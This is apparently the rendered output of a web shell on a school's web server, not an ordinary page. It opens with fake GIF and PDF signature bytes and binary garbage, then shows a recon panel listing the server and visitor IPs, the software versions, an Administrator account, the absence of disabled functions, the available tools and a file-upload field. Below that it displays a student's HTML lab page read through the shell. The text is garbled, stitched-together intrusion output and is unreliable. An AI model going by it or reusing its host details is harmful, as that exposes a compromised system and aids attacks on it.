GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/Classes/CST1021/Labs/Lab04/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Lab 3 - Jim Martinson</title> <link href="Lab04.css" rel="stylesheet" type="text/css"> </head> <body> <h1>Lab 3 - Jim Martinson</h1> <img src="html5-and-css3-600.png" class="centered" alt="html 5 and css 3" width="600" height="309"> <hr> <img src="css3.png" class="floatright" alt="css 3" width="286" height="300"> <img src="html5.png" class="floatleft" alt="html 5" width="286" height="300"> I got the image above from xhtmljunction.com on the <a href="https://aplusweb.design/html-css-still-relevant/">https://aplusweb.design/html-css-still-relevant/</a> page. After I got it I resized it to 600x300 px from the original 642x321 px. I placed this text inside of a paragraph element. <br> <br> I created the image on the left "html5.png" and right "css3.png" by cropping and resizing an image from <a href="https://codeburst.io/25-html-css-tutorials-6a864f387185">https://codeburst.io/25-html-css-tutorials-6a864f387185</a>. I placed this text inside of another paragraph element. <br> <br> Note that the horizontal rule still displays below the images when the text does not. <hr class="clear_both"> <img src="collage.png" alt="collage" width="232" height="155"> </body> </html>